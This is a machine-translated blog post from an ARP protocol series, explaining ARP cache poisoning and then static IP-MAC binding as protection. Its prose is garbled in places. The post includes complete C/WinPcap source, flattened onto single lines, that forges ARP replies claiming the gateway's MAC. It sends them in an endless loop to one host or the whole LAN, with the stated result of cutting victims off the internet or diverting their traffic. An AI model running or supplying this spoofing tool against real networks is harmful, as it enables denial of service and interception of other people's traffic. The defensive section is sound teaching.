ARP Protocol (5) ARP Attack and protection

First, ARP attack
We first look at the function of ARP: The basic function of the ARP protocol is to use the IP address of the target device to query the MAC address of the target device to ensure the communication.

The specific implementation of ARP, I in the "ARP Protocol (1) what is the ARP protocol" has been described:

Q: How is this mapping table generated? A:
(1) In this table, the lifetime of each record (non-static) is typically 20 minutes, starting from the time it was created and once it expires, it will be deleted in this table. (Manually delete all, you can use the arp-d * command).
(2) When a host to send information to B, a first in the ARP cache query B's IP if there is a corresponding MAC address, if there is a B IP corresponding to the MAC address is taken out encapsulated in the packet, and then sent out.
(3) If a does not find the Mac corresponding to b IP in the ARP cache, then broadcast or ask the Gateway (route) to the LAN where A is located: who has the Mac of B IP, please tell a.
(4) If B and a is the same LAN, B back this message, and put B's MAC address on, A and then the B's IP and Mac write to the ARP cache (generally effective time is 20 minutes).
(5) If B and a are not the same LAN, and a gateway that is located knows (or indirectly knows (ask and contract)) B's Mac, then the gateway sends a message to a, and takes the MAC address of B. A when the message is received, the IP and Mac of B are written to the ARP cache (generally valid for 20 minutes).
(6) If no one responds, it expires and the other person cannot reach.

The problem is, in (4), if the host F, to a response, said a asked the IP Mac is x (not the correct B Mac), a received after it was written to the Ip-mac cache, a to B after the request, all to F went. This has resulted in deception.
If the host F forged is the LAN Gateway MAC, and F with the LAN, the host of the F attack will not be able to network (because the attack of the main sentence sent to the gateway packet all the Austrian F host), until the attack host Ip-mac cache expired, get to the correct gateway address (IP-MAC).

From the above analysis can know, to implement ARP attack, as long as in the local area network to the attacked host to send a forged ARP response packet, so it is very easy to encode the implementation is very simple.
In the previous article, ARP packets can already be sent:

/* Function: Src_mac broadcast to LAN: TARGET_IP 192.168.1.111 's Mac is how much */int Text1 (Arp *arp) {U_char Dest_mac[6] = {0xff,0xff,0xff,0xff,0x ff,0xff};//broadcast U_char Src_mac[6] = {0xf0,0x7b,0xcb,0xa3,0x15,0x85};//source MAC address f0-7b-cb-a3-15-85 U_char Sender_mac[6] = {0x F0,0X7B,0XCB,0XA3,0X15,0X85}; Send-side Mac f0-7b-cb-a3-15-85 U_char sender_ip[4] = {0XC0,0XA8,0X01,0X65}; Send side IP address 192.168.1.101 u_char target_mac[6] = {0x00,0x00,0x00,0x00,0x00,0x00}; Mac is empty U_char target_ip[4] = {0xc0,0xa8,0x01,0x6f} because you do not know the Mac; Destination IP 192.168.1.111; if (packetarprequest (arp,dest_mac,src_mac,sender_mac,sender_ip,target_mac,target_ip) = =-1) {  printf ("Packet ARP request error\n ");  return-1; } return 0;}

We just need to modify these parameters in the TEXT1 function as follows:

/* Experimental host XXH_MAC:XXH mac XXH_IP:XXH machine IP route_mac: router's Mac route_ip: Router IP mobile_mac: Mac mobile_ip for Phone: IP BROADC for mobile phone AST: Broadcast address XL_MAC:XL machine's Mac XL_IP:XL machine Ip*/u_char xxh_mac[6] = {0xf0,0x7b,0xcb,0xa3,0x15,0x85};u_char Xxh_ip[4] = {0xC0,0 Xa8,0x00,0x68};u_char Route_mac[6] = {0x80,0x89,0x17,0xcf,0xe6,0x6e};u_char Route_ip[4] = {0xC0,0xA8,0x00,0x01};u_ Char Mobile_mac[6] = {0x78,0xa8,0x73,0x82,0xbe,0xa4};u_char Mobile_ip[4] = {0xc0,0xa8,0x00,0x66};u_char Broadcast[6] = {0xff,0xff,0xff,0xff,0xff,0xff};u_char Xl_mac[6] = {0x00,0x21,0x00,0x29,0x75,0x04};u_char Xl_ip[4] = {0xC0,0xA8,0x00 , 0x6c};//192.168.0.108

/* Spoof host XL only tells XL this machine, Route_ip's Mac is Xxh_mac*/int Text3 (Arp *arp) {//broadcast route_mac route_ip mobile_mac mobile_ip xxh_ Mac Xxh_ip if (Packetarpreplay (arp,xl_mac,xxh_mac,xxh_mac,route_ip,xxh_mac,xxh_ip) = =-1) {  printf ("Packet ARP Request Error\n ");  return-1; } return 0;}

After the package is sent out, XL this machine will not be able to surf the internet, we are querying the XL ARP cache:

From the above to see 192.168.0.1 corresponding Mac for 192.168.0.104 mac (f0-7b-cb-a3-15-85 for xxh192.168.0.104 host Mac), the host XL will no longer be on the net, until it gets to the correct gateway Ip-mac.

The scope of the ARP attack: is in the local area network.
ARP attacks can do:
(1) With ARP spoofing, we can get all the packets to be sent to the attacker.
(2) through ARP spoofing, the attacked machine can not be properly connected to the Internet.

How can you do something useful by using an ARP vulnerability to attack ?
Walking on the way home, I yy a usable method, but in the actual production, may not be used, but can provide a way of thinking:
In a distributed deployment, if a machine fails, the traffic that accesses the machine needs to be directed to another machine, and then ARP can be used (how?). You know that, don't you? ), but in the actual production environment, there will be better solutions, in the future we are in detail to talk about.

Second, ARP protection
From the above, the ARP attack, mainly exploits the ARP vulnerability: the host in the query is not IP-MAC cache, to the local area network to send inquiry request, thereby being illegally attacked.
Then, the premise of the attack is that the host in the Ip-mac query, only the possibility of attack, then if I found in Ip-mac, then to avoid the ARP attack?
Enemies!
As we have said before, the general validity time of the ARP cache is 20 minutes, so how can we find the corresponding message in Ip-mac?
Binding ip-mac! (somewhat similar to the concept of bound routes)

The last column of the graph, "type", has both dynamic and static. Dynamic is temporary cache (20 minutes), Static is a lonely binding.

How to bind?
1. View network status
Netsh i i show in

My computer is active available with the IDX of the network adapter is 12
2. Set IP <---> macnetsh-c "I i" add neighbors [idx serial number] [IP address] [MAC address]


192.168.1.1 and a8-57-4e-5c-92-56 are bound.

For a network administrator, you can also bind to the gateway,

This page is my home router (the phone is logged on, so the picture looks relatively small).
The above provides a binding button operation, after binding, the route is more secure.

PS: Now think of it, in the Thunder, the new collar of the computer to the Internet, the computer needs to be reported to the operation of the Mac to colleagues, and then to the Internet. It is not clear what they want the computer's Mac to do, it is the original.

At the same time, you can also install some ARP firewall or software (I guess, they are not the same principle)


OK, the entire ARP series is complete, how do you see, welcome to discuss the exchange:
Public number, search for echo, or sweep the QR code below to exchange attention


Source:

<span style= "FONT-SIZE:14PX;" > #if 0#include <stdlib.h> #include <stdio.h>//pcap_findalldevs_ex#define have_remote#include < pcap.h>/* Experimental host XXH_MAC:XXH machine MACXXH_IP:XXH machine Iproute_mac: Macroute_ip of Router: Ipmobile_mac of Router: macmobile_ip of mobile phone: Phone Ipbroadcast: Broadcast address XL_MAC:XL machine MACXL_IP:XL machine Ip*/u_char xxh_mac[6] = {0xf0,0x7b,0xcb,0xa3,0x15,0x85};u_char xxh_ip [4] = {0xc0,0xa8,0x00,0x68};u_char Route_mac[6] = {0x80,0x89,0x17,0xcf,0xe6,0x6e};u_char Route_ip[4] = {0xC0,0xA8,0x00 , 0x01};u_char mobile_mac[6] = {0x78,0xa8,0x73,0x82,0xbe,0xa4};u_char Mobile_ip[4] = {0xc0,0xa8,0x00,0x66};u_char Broadcast[6] = {0xff,0xff,0xff,0xff,0xff,0xff};u_char Xl_mac[6] = {0x00,0x21,0x00,0x29,0x75,0x04};u_char Xl_ip[4] = { 0xc0,0xa8,0x00,0x6c};//192.168.0.108//Ethernet's first typedef struct ETHHEAD{U_CHAR dest_mac[6];//Ethernet Destination address U_char src_mac[6] ///Ethernet Source Address U_char type[2];//frame type arp:0x0806}ethhead;//ARP packet typedef struct ARPMSG{U_CHAR mac_type[2];//Hardware type Ethernet: 1u_cha R protocal_type[2];//protocol Type IP address: 0x0800u_cHar mac_len;//Hardware address length 6u_char protocal_len;//protocol address length 4u_char op[2];//action field ARP Request: 1 ARP reply: 2 Rarp request: 3 Rarp reply: 4 U_char Sender _mac[6];//send-side Ethernet address U_char sender_ip[4];//send-side IP address U_char target_mac[6];//destination Ethernet address U_char target_ip[4];//Destination IP address}arpmsg ;//Ethernet arptypedef struct Arp{ethhead eth_head; Arpmsg arpmsg;} arp;/* function Name: Packetarp function: Package ARP packet parameter: Arp_req:arp type, out of parameter op: Action field ARP Request: 1 ARP response: 2 rarp Request: 3 rarp corresponding: 4dest_mac: Ethernet Destination SRC_MAC: Ethernet Source Address Sender_mac: Sender Ethernet Address sender_ip: Send side IP address TARGET_MAC: Destination Ethernet address target_ip: Destination IP address return: 0 correct, 1 error */int Packetarp (Arp *arp_req, U_char op, U_char dest_mac[6], U_char src_mac[6], U_char sender_mac[6], U_char sender_ip[4], U_char target_ MAC[6], U_char target_ip[4]) {if (Arp_req = = NULL) return-1;memcpy (Arp_req->eth_head.dest_mac, Dest_mac, 6); memcpy ( Arp_req->eth_head.src_mac, Src_mac, 6); arp_req->eth_head.type[0] = 0x08;arp_req->eth_head.type[1] = 0x06;// Arp_req->eth_head.type = htons (Arp_req->eth_head.type); arp_req->arpmsg.mac_type[0] = 0x00;arp_rEQ-&GT;ARPMSG.MAC_TYPE[1] = 0x01;arp_req->arpmsg.protocal_type[0] = 0x08;arp_req->arpmsg.protocal_type[1] = 0x00;arp_req->arpmsg.mac_len = 0x06;arp_req->arpmsg.protocal_len = 0x04;arp_req->arpmsg.op[0] = 0x00;arp_ REQ-&GT;ARPMSG.OP[1] = op;memcpy (Arp_req->arpmsg.sender_mac, Sender_mac, 6); memcpy (arp_req->arpmsg.sender_ip , SENDER_IP, 4); memcpy (Arp_req->arpmsg.target_mac, Target_mac, 6); memcpy (Arp_req->arpmsg.target_ip, TARGET_IP , 4); return 0;} ARP Request packet int packetarprequest (ARP *arp_req, U_char dest_mac[6], U_char src_mac[6], U_char sender_mac[6], U_char sender_ip [4], U_char target_mac[6], U_char target_ip[4]) {return Packetarp (arp_req,0x01,dest_mac,src_mac,sender_mac,sender_ip , target_mac,target_ip);} ARP response packet int packetarpreplay (ARP *arp_req, U_char dest_mac[6], U_char src_mac[6], U_char sender_mac[6], U_char sender_ip[ 4], U_char target_mac[6], U_char target_ip[4]) {return Packetarp (ARP_REQ,0X02,DEST_MAC,SRC_MAC,SENDER_MAC,SENDER_IP, TARGET_MAC,TARGET_IP);} Open NetworkAdapter pcap_if_t* Choose_interface () {pcap_if_t *alldevs;pcap_if_t *d;int inum;int I=0;char Errbuf[PCAP_ERRBUF_SIZE]; /* Retrieve The device list on the local machine */if (PCAP_FINDALLDEVS_EX (pcap_src_if_string, NULL, &alldevs, err        BUF) = =-1) {fprintf (stderr, "Error in Pcap_findalldevs:%s\n", errbuf);    Exit (1);        }/* Print the list */for (D=alldevs; d; d=d->next) {printf ("%d.%s", ++i, D->name);        if (d->description) printf ("(%s) \ n", d->description);    else printf ("(No description available) \ n"); } if (i==0) {printf ("\nno Interfaces found!        Make sure WinPcap is installed.\n ");    return NULL;    } printf ("Enter The interface Number (1-%d):", I);        scanf_s ("%d", &inum);        if (Inum < 1 | | inum > i) {printf ("\ninterface number out of range.\n");        /* Free the device list */Pcap_freealldevs (ALLDEVS);    return NULL;           } /* Jump to the selected adapter */for (D=alldevs, i=0; i< inum-1;d =d->next, i++); return D;} /*XXH (192.168.0.104) broadcast: 192.168.0.102 's Mac is how much results: arp-a no results */int Text1 (arp *arp) {U_char Dest_mac[6] = {0xff,0xff,0xff, 0xff,0xff,0xff};u_char Src_mac[6] = {0xf0,0x7b,0xcb,0xa3,0x15,0x85};u_char Sender_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15 , 0x85};u_char sender_ip[4] = {0xc0,0xa8,0x00,0x68}; Send side IP address 192.168.0.104u_char target_mac[6] = {0x00,0x00,0x00,0x00,0x00,0x00};u_char Target_ip[4] = {0xC0,0xA8,0x00, 0X66}; 192.168.0.102;if (packetarprequest (arp,dest_mac,src_mac,sender_mac,sender_ip,target_mac,target_ip) = =-1) { printf ("Packet ARP request error\n"); return-1;} return 0;} /* Whole NET spoof broadcast Route_ip Mac is xxh_mac cause except xxh machine, Result: All machines are on network */int Text2 (ARP *arp) {//broadcast Route_mac route_ip Mobile_mac Mobile_ip Xxh_mac xxh_ipif (packetarpreplay (arp,broadcast,xxh_mac,xxh_mac,route_ip,xxh_mac,xxh_ip) = =-1) {printf (" Packet ARP Request error\n "); return-1;} return 0;} /* Cheat XL only tell XL this machine, Route_ip's Mac is XXH_mac Result: All machines are on the network */int Text3 (ARP *arp) {//broadcast route_mac route_ip mobile_mac mobile_ip xxh_mac xxh_ipif ( Packetarpreplay (arp,xl_mac,xxh_mac,xxh_mac,route_ip,xxh_mac,xxh_ip) = =-1) {printf ("Packet ARP request error\n"); return-1;} return 0;}    void Main (int argc, char **argv) {pcap_t *fp;char errbuf[pcap_errbuf_size];u_char packet[42];int i; pcap_if_t *d = Choose_interface (); if (d = = NULL) {exit (1);}    Char *source = d->name;                /* Open the output device */if ((fp= pcap_open (source,///name of the device 100,   portion of the packet to capture (only the first bytes) pcap_openflag_promiscuous,               Promiscuous mode,//Read timeout NULL,                        Authentication on the remote machine ERRBUF//error buffer ) = = NULL) {fprintf (stderr, "\nunable to open the adapter.%s is nOT supported by winpcap\n ", argv[1]);    Return }arp arp;if (TEXT3 (&arp) = =-1) {return;}    memcpy (packet, (void*) &arp, 42); /* Send down the Packet */while (1) {if (Pcap_sendpacket (FP, packet, */size */)! = 0) {fprintf (stderr, "\nerror sending th E packet:%s\n ", Pcap_geterr (FP)); return;} printf ("Sleep () \ n");    Sleep (2000);} return;} #endif </span><span style= "FONT-SIZE:14PX;" ></span>

Copyright NOTICE: This article for Bo Master original article, without Bo Master permission not reproduced.

ARP Protocol (5) ARP Attack and protection